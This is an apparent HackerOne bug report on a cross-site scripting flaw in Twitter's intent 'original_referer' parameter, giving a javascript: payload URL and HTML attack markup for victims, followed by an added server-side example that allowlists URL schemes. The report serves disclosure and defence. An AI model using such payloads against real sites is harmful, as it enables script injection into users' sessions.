Twitter: XSS in original referrer after follow

2015-03-05T11:34:49
ID H1:50134
Type hackerone
Reporter akhil-reni
Modified 2015-03-09T18:37:58

Description

Hey hi,

There is an XSS in the intent functionality.

Steps to reproduce

1) Copy and paste the following link: https://twitter.com/intent/favorite/complete?tweet_id=572435913768366080&already_favorited=false&original_referer=javascript:alert%281%29;

2) Click follow

3) Now click return to previous site; you will see an XSS triggered.

Requirements

  • Make sure you pick a tweet of a user that you don't follow.
  • To execute, you need to send a null referrer.

Here is the HTML code to attack victims:

<html> <a href="https://twitter.com/intent/favorite/complete?tweet_id=572435913768366080&already_favorited=false&original_referer=javascript:alert%281%29; " rel="noreferrer">click here and follow</a> </html>

a rel=noreferrer will do our work.

Regards Wesecureapp
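
A server-side check that would refuse the `original_referer` value from this report before it is rendered as the "return to previous site" link, shown as an added example that is not part of the original report and not Twitter's code. The names `safeReturnUrl` and `renderReturnLink` and the link text are hypothetical.

```javascript
// Added example (hypothetical names): allowlist the scheme of a
// user-supplied "return to" URL before it is written into an href.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Returns a normalised absolute http(s) URL, or null if the value is unsafe.
function safeReturnUrl(originalReferer) {
  if (typeof originalReferer !== "string" || originalReferer.length === 0) {
    return null;
  }
  let parsed;
  try {
    // The WHATWG URL parser normalises the way a browser does when it
    // follows an href: surrounding whitespace is trimmed, tabs and newlines
    // are dropped, and the scheme is lowercased. Checking the parsed scheme
    // therefore also catches " JavaScript:" and "java\tscript:".
    parsed = new URL(originalReferer);
  } catch (e) {
    return null; // relative or unparseable value: nothing to link back to
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) {
    return null; // javascript:, data:, vbscript: and anything else
  }
  return parsed.href; // emit the normalised form, never the raw input
}

// Escape a string for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return value
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Builds the link markup, or an empty string when no safe URL exists.
function renderReturnLink(originalReferer) {
  const url = safeReturnUrl(originalReferer);
  if (url === null) {
    return "";
  }
  return `<a href="${escapeAttr(url)}">Return to previous site</a>`;
}
```

Rejecting by parsed scheme rather than by matching the raw string for "javascript:" is what covers the case and whitespace variants.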